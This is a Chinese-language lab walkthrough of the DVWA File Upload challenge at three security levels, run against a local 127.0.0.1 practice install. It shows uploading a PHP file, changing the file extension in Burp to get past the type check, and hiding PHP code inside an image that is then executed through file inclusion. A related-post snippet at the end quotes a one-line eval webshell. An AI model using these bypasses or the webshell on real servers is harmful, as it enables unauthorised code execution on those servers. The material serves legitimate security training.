首页 > 其他分享 >DVWA靶场通关-File Upload(文件上传)

DVWA靶场通关-File Upload(文件上传)

时间:2023-09-17 20:44:07浏览次数:37  
标签:文件 127.0 0.1 Upload DVWA dvwa File 上传 png

Brute Force(暴力(破解))、Command Injection(命令行注入)、CSRF(跨站请求伪造)、         File Inclusion(文件包含)、File Upload(文件上传)、Insecure CAPTCHA (不安全的验证码)、       SQL Injection(SQL注入)、SQL Injection(Blind)(SQL盲注)、XSS(DOM)(基于DOM树)、       XSS(Reflected)(反射型跨站脚本)、XSS(Stored)(存储型跨站脚本)

原因:

对于上传文件的后缀名(扩展名)没有做较为严格的限制
对于上传文件的MIMETYPE(用于描述文件的类型的一种表述方法) 没有做检查
权限上没有对于上传的文件目录设置不可执行权限,(尤其是对于shebang类型的文件)
对于web server对于上传文件或者指定目录的行为没有做限制

等级low

<?php phpinfo();?>                  3.PHP

访问文件http://127.0.0.1/dvwa/hackable/uploads/3.php

等级Medium

 只能上传jpeg或者png后缀,将文件改名3.png

burp抓包,将后缀改回PHP

http://127.0.0.1/dvwa/hackable/uploads/3.php

等级high

需要制作图片马

https://www.iconfont.cn/   去这个网站找个箭头图标

 放在同一个文件夹

删除输入cmd+回车,呼唤出cmd

 copy 1.png/B + 3.php  4.png                   输入

 上传4.png

http://127.0.0.1/dvwa/hackable/uploads/4.png

调节难度为low,打开文件包含题目,访问上传的文件

http://127.0.0.1/dvwa/vulnerabilities/fi/?page=http://127.0.0.1/dvwa/hackable/uploads/4.png

 

 

翻译

搜索

复制

<iframe></iframe>   存网盘

标签:文件,127.0,0.1,Upload,DVWA,dvwa,File,上传,png
From: https://www.cnblogs.com/TinKode123/p/17709759.html

相关文章

  • DVWA靶场通关-CSRF(跨站请求伪造)
    BruteForce(暴力(破解))、CommandInjection(命令行注入)、CSRF(跨站请求伪造)、     FileInclusion(文件包含)、FileUpload(文件上传)、InsecureCAPTCHA(不安全的验证码)、    SQLInjection(SQL注入)、SQLInjection(Blind)(SQL盲注)、XSS(DOM)(基于DOM树)、    XSS(Reflec......
  • DVWA靶场通关-Command Injection(命令行注入)
    BruteForce(暴力(破解))、CommandInjection(命令行注入)、CSRF(跨站请求伪造)、     FileInclusion(文件包含)、FileUpload(文件上传)、InsecureCAPTCHA(不安全的验证码)、    SQLInjection(SQL注入)、SQLInjection(Blind)(SQL盲注)、XSS(DOM)(基于DOM树)、    XSS(Reflec......
  • DVWA靶场环境搭建+Phpstudy配置
    1、DVWA介绍在近些年网络安全的高速发展中,初学者已经很难找到一个网站进行渗透了,曾几何时,一个漏洞,一个工具就可以在网上找到很多有漏洞的网站去体验,当然渗透一个未经授权的系统是非法的。因此,为了能够较为真实地学习Web渗透的各种技术,就需要找一个专门用于学习的Web演练平台,人们......
  • 缩略图upload
    <el-uploadaction="https://jsonplaceholder.typicode.com/posts/"list-type="picture-card":on-preview="handlePictureCardPreview":on-remove="handleRemove"><iclass="el-icon-plus"><......
  • el-upload file转blob 用于预览pdf.js和下载文件
    //file转blobfileToBlob(file,callback){consttype=file.type;constreader=newFileReader();reader.onload=(evt)=>{constblob=newBlob([evt.target.result],{type});if(typeofcallback==="f......
  • springmvc中设置文件的上传与下载,首先需要导入依赖,之后需要在springmvc.xml中配置问价
    2023-09-16导入依赖<dependency><groupId>commons-fileupload</groupId><artifactId>commons-fileupload</artifactId><version>1.4</version></dependency>设置文件上传解析器springmvc.xml<?xml......
  • Ubuntu16.04下C语言编译及makefile应用
    一、不同环境下C语言的编译在Ubuntu16.04下:step1:编写main1.c主程序用nano编好,下面为主程序展示注意:1、主程序中函数的声明step2:编写子程序 step3:用gcc命令编译采用多个文件一起编译,输出放在main1中 gcc的常见用法:-c只生成目标文件不进行连接,用于对目标文件的分别......
  • Pycharm远程连接到服务器运行错误can‘t open file ‘tmp
    Pycharm远程连接到服务器运行错误can‘topenfile‘/tmp/.../a.py‘:[Errno2]Nosuchfileordirectory问题描述win11Pycharm+Linux服务器,运行代码后显示上述错误。即linux环境中没有xx文件。分析:python默认到/tmp/下去找代码并执行,但x.py文件根本不再tem路径下。即......
  • uploads-lab2
    源代码:$is_upload=false;$msg=null;if(isset($_POST['submit'])){if(file_exists(UPLOAD_PATH)){if(($_FILES['upload_file']['type']=='image/jpeg')||($_FILES['upload_file']['type�......
  • linux DVWA 文件上传之 Security level set to high
    --总体步骤1、生成图片木马2、上传图片木马3、通过文件包含执行图片马一、生成图片木马1、随便准备一张图片——football.png2、test.php写入内容:<?php@eval($_GET['x']);?>3、生成图片木马,命令行执行:catfootball.pngtest.php>>my.png二、把DVWA的安全级别......